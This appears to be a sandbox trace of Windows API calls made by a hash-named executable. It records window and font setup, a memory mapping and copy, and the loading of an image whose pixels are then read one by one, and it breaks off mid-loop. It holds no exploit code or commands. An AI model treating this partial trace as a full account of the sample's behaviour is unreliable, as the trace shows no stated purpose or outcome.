[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xaac3f61e, Data2=0x4744, Data3=0x4227, Data4=([0]=0x98, [1]=0xea, [2]=0xdb, [3]=0x5a, [4]=0x4c, [5]=0x1b, [6]=0x7d, [7]=0x2f))) returned 0x0
[0150.763] CoCreateGuid (in: pguid=0x19e394 | out: pguid=0x19e394*(Data1=0xa6774291, Data2=0x1554, Data3=0x4117, Data4=([0]=0xa7, [1]=0xce, [2]=0xab, [3]=0x77, [4]=0xdc, [5]=0xe1, [6]=0x82, [7]=0xda))) returned 0x0
[0150.785] CoCreateGuid (in: pguid=0x19e440 | out: pguid=0x19e440*(Data1=0x47194323, Data2=0x15be, Data3=0x4e67, Data4=([0]=0x98, [1]=0xc8, [2]=0xb6, [3]=0xe0, [4]=0x72, [5]=0x22, [6]=0x2e, [7]=0xb4))) returned 0x0
[0150.785] CoCreateGuid (in: pguid=0x19e440 | out: pguid=0x19e440*(Data1=0x605deb69, Data2=0xfa76, Data3=0x419a, Data4=([0]=0x8f, [1]=0xc9, [2]=0x5, [3]=0x60, [4]=0x35, [5]=0x6c, [6]=0xd7, [7]=0x55))) returned 0x0
[0150.786] CoCreateGuid (in: pguid=0x19e440 | out: pguid=0x19e440*(Data1=0xaeaa3a1, Data2=0x6932, Data3=0x4b58, Data4=([0]=0xaf, [1]=0x3b, [2]=0xac, [3]=0x22, [4]=0x43, [5]=0xe5, [6]=0x74, [7]=0xfd))) returned 0x0
[0151.956] DrawTextExW (in: hdc=0x2b010970, lpchText="j^", cchText=2, lprc=0x19ea3c, format=0x420, lpdtp=0x22aa2c0 | out: lpchText="j^", lprc=0x19ea3c) returned 13
[0151.959] GdipGetFamilyName (in: family=0x5cd58b0, name=0x19e978, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0151.959] GetDeviceCaps (hdc=0x2b010970, index=90) returned 96
[0151.960] CoTaskMemAlloc (cb=0x5c) returned 0x85ba70
[0151.960] CreateFontIndirectW (lplf=0x85ba70) returned 0x40a0907
[0151.960] CoTaskMemFree (pv=0x85ba70)
[0151.960] GetObjectW (in: h=0x40a0907, c=92, pv=0x19e93c | out: pv=0x19e93c) returned 92
[0151.966] GetTextExtentPoint32W (in: hdc=0x2b010970, lpString="0", c=1, psizl=0x22aa494 | out: psizl=0x22aa494) returned 1
[0151.972] DeleteObject (ho=0x40a0907) returned 1
[0151.973] GetSystemMetrics (nIndex=45) returned 2
[0151.973] GetSystemMetrics (nIndex=46) returned 2
[0151.973] GetSystemMetrics (nIndex=7) returned 3
[0151.973] GetSystemMetrics (nIndex=8) returned 3
[0151.974] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0151.974] AdjustWindowRectEx (in: lpRect=0x19eb5c, dwStyle=0x56210243, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb5c) returned 1
[0151.974] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0151.974] AdjustWindowRectEx (in: lpRect=0x19eb5c, dwStyle=0x56210243, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb5c) returned 1
[0151.977] GetSystemMetrics (nIndex=5) returned 1
[0151.977] GetSystemMetrics (nIndex=6) returned 1
[0151.978] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0151.978] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb4c) returned 1
[0151.978] GetSystemMetrics (nIndex=5) returned 1
[0151.978] GetSystemMetrics (nIndex=6) returned 1
[0151.978] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0151.999] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb4c) returned 1
[0152.002] GetSystemMetrics (nIndex=5) returned 1
[0152.002] GetSystemMetrics (nIndex=6) returned 1
[0152.003] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.003] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb4c) returned 1
[0152.003] GetSystemMetrics (nIndex=5) returned 1
[0152.003] GetSystemMetrics (nIndex=6) returned 1
[0152.003] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.003] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb4c) returned 1
[0152.009] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0152.009] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x22aa62c) returned 0x0
[0152.010] GdipGetFontSize (font=0x5cdb020, size=0x22aa630) returned 0x0
[0152.011] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.011] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0152.011] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.011] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0152.014] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.014] AdjustWindowRectEx (in: lpRect=0x19eb78, dwStyle=0x56010004, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb78) returned 1
[0152.015] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.015] AdjustWindowRectEx (in: lpRect=0x19eb78, dwStyle=0x56010004, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eb78) returned 1
[0152.017] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0152.018] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41340000, style=1, unit=0x3, font=0x22aa82c) returned 0x0
[0152.018] GdipGetFontSize (font=0x5cdb048, size=0x22aa830) returned 0x0
[0152.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.018] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0152.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.018] AdjustWindowRectEx (in: lpRect=0x19eb4c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eb4c) returned 1
[0152.024] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.024] AdjustWindowRectEx (in: lpRect=0x19ebac, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19ebac) returned 1
[0152.024] GetSystemMetrics (nIndex=59) returned 1456
[0152.024] GetSystemMetrics (nIndex=60) returned 916
[0152.024] GetSystemMetrics (nIndex=34) returned 136
[0152.024] GetSystemMetrics (nIndex=35) returned 39
[0152.025] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.025] AdjustWindowRectEx (in: lpRect=0x19eaac, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19eaac) returned 1
[0152.025] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.026] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GetCurrentThreadId () returned 0x1394
[0152.027] GdipCreateFontFamilyFromName (name="Microsoft Sans Serif", fontCollection=0x0, fontFamily=0x19ebc8) returned 0x0
[0152.028] GdipCreateFont (fontFamily=0x5cd58b0, emSize=0x41100000, style=1, unit=0x3, font=0x22ab0c0) returned 0x0
[0152.028] GdipGetFontSize (font=0x5cdb070, size=0x22ab0c4) returned 0x0
[0152.030] CreateCompatibleDC (hdc=0x0) returned 0x5010907
[0152.033] GetDC (hWnd=0x0) returned 0x26010954
[0152.034] GdipCreateFromHDC (hdc=0x26010954, graphics=0x19e9d0) returned 0x0
[0152.035] CoTaskMemAlloc (cb=0x5c) returned 0x85ba70
[0152.035] GdipGetLogFontW (font=0x5cdb070, graphics=0x5cdf268, logfontW=0x85ba70) returned 0x0
[0152.048] CoTaskMemFree (pv=0x85ba70)
[0152.048] CoTaskMemAlloc (cb=0x5c) returned 0x85c088
[0152.048] CoTaskMemFree (pv=0x85c088)
[0152.048] CoTaskMemAlloc (cb=0x5c) returned 0x85bba8
[0152.049] CoTaskMemFree (pv=0x85bba8)
[0152.049] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0152.049] ReleaseDC (hWnd=0x0, hDC=0x26010954) returned 1
[0152.049] CoTaskMemAlloc (cb=0x5c) returned 0x85c088
[0152.049] CreateFontIndirectW (lplf=0x85c088) returned 0x40a0905
[0152.049] CoTaskMemFree (pv=0x85c088)
[0152.050] SelectObject (hdc=0x5010907, h=0x40a0905) returned 0x18a0048
[0152.050] GetTextMetricsW (in: hdc=0x5010907, lptm=0x19eacc | out: lptm=0x19eacc) returned 1
[0152.052] GetTextExtentPoint32W (in: hdc=0x5010907, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x22aba58 | out: psizl=0x22aba58) returned 1
[0152.052] SelectObject (hdc=0x5010907, h=0x18a0048) returned 0x40a0905
[0152.052] DeleteDC (hdc=0x5010907) returned 1
[0152.056] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.056] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.056] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.056] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.057] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.057] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x56010004, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea5c) returned 1
[0152.057] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.057] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x56010004, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19e8c0) returned 1
[0152.057] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.058] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.058] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.058] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600100d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.058] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.058] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea5c) returned 1
[0152.058] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.058] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19e8c0) returned 1
[0152.058] GetSystemMetrics (nIndex=5) returned 1
[0152.058] GetSystemMetrics (nIndex=6) returned 1
[0152.059] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.059] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea5c) returned 1
[0152.059] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.059] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19e8c0) returned 1
[0152.059] GetSystemMetrics (nIndex=5) returned 1
[0152.059] GetSystemMetrics (nIndex=6) returned 1
[0152.059] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.059] AdjustWindowRectEx (in: lpRect=0x19ea4c, dwStyle=0x56210243, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea4c) returned 1
[0152.060] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.060] AdjustWindowRectEx (in: lpRect=0x19e8b0, dwStyle=0x56210243, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19e8b0) returned 1
[0152.060] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.060] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.060] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.060] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.060] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.061] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.061] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.061] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.061] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.061] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.061] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.061] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.062] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.062] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.062] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.062] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.062] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.062] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.062] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.063] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.063] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.063] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.063] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.063] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.063] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.063] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.064] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.064] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.064] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.064] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.064] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.064] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.064] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.065] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.065] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.065] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.065] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.065] AdjustWindowRectEx (in: lpRect=0x19ea5c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ea5c) returned 1
[0152.065] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.065] AdjustWindowRectEx (in: lpRect=0x19e8c0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19e8c0) returned 1
[0152.069] DeleteObject (ho=0x40a0905) returned 1
[0152.069] GetDC (hWnd=0x0) returned 0x26010954
[0152.069] GdipCreateFromHDC (hdc=0x26010954, graphics=0x19eaa0) returned 0x0
[0152.070] GdipGetFontHeight (font=0x5cdb070, graphics=0x5cdf268, height=0x19ea98) returned 0x0
[0152.070] GdipDeleteGraphics (graphics=0x5cdf268) returned 0x0
[0152.070] ReleaseDC (hWnd=0x0, hDC=0x26010954) returned 1
[0152.070] GetSystemMetrics (nIndex=5) returned 1
[0152.070] GetSystemMetrics (nIndex=6) returned 1
[0152.070] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.070] AdjustWindowRectEx (in: lpRect=0x19eaac, dwStyle=0x56010004, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19eaac) returned 1
[0152.071] GetSystemMetrics (nIndex=5) returned 1
[0152.071] GetSystemMetrics (nIndex=6) returned 1
[0152.071] GetSystemMetrics (nIndex=5) returned 1
[0152.071] GetSystemMetrics (nIndex=6) returned 1
[0152.071] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.071] AdjustWindowRectEx (in: lpRect=0x19ea50, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea50) returned 1
[0152.071] GetSystemMetrics (nIndex=5) returned 1
[0152.071] GetSystemMetrics (nIndex=6) returned 1
[0152.071] GetSystemMetrics (nIndex=5) returned 1
[0152.071] GetSystemMetrics (nIndex=6) returned 1
[0152.071] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c550000
[0152.071] AdjustWindowRectEx (in: lpRect=0x19ea50, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19ea50) returned 1
[0152.085] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe.config", nBufferLength=0x105, lpBuffer=0x19e494, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe.config", lpFilePart=0x0) returned 0x69
[0152.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e944) returned 1
[0152.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e9c0 | out: lpFileInformation=0x19e9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0152.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e940) returned 1
[0152.473] GetSystemMetrics (nIndex=11) returned 32
[0152.473] GetSystemMetrics (nIndex=12) returned 32
[0152.473] GetDC (hWnd=0x0) returned 0x26010954
[0152.473] GetDeviceCaps (hdc=0x26010954, index=12) returned 32
[0152.473] GetDeviceCaps (hdc=0x26010954, index=14) returned 1
[0152.473] ReleaseDC (hWnd=0x0, hDC=0x26010954) returned 1
[0152.474] CreateIconFromResourceEx (presbits=0x22ce5ec, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xa0153
[0155.020] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4400, lpName=0x0) returned 0x338
[0155.021] memcpy (in: _Dst=0x4910000, _Src=0x22e62a0, _Size=0x4400 | out: _Dst=0x4910000) returned 0x4910000
[0155.021] CloseHandle (hObject=0x338) returned 1
[0181.026] GdipLoadImageFromStream (stream=0x49b0030, image=0x19db10) returned 0x0
[0181.410] GdipImageForceValidation (image=0x5cdf268) returned 0x0
[0181.425] GdipGetImageType (image=0x5cdf268, type=0x19db0c) returned 0x0
[0181.425] GdipGetImageRawFormat (image=0x5cdf268, format=0x19da80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0181.481] GdipGetImageWidth (image=0x5cdf268, width=0x19e06c) returned 0x0
[0181.481] GdipGetImageHeight (image=0x5cdf268, height=0x19e06c) returned 0x0
[0181.489] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.489] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.489] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=0, color=0x19e028) returned 0x0
[0181.497] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.497] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.497] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=1, color=0x19e028) returned 0x0
[0181.507] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.507] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.507] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=2, color=0x19e028) returned 0x0
[0181.508] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.508] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.508] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=3, color=0x19e028) returned 0x0
[0181.508] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.508] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.508] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=4, color=0x19e028) returned 0x0
[0181.508] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.508] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.508] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=5, color=0x19e028) returned 0x0
[0181.508] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.510] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.510] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=6, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=7, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=8, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=9, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=10, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=11, color=0x19e028) returned 0x0
[0181.511] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.511] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.511] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=12, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=13, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=14, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=15, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=16, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=17, color=0x19e028) returned 0x0
[0181.512] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.512] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.512] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=18, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=19, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
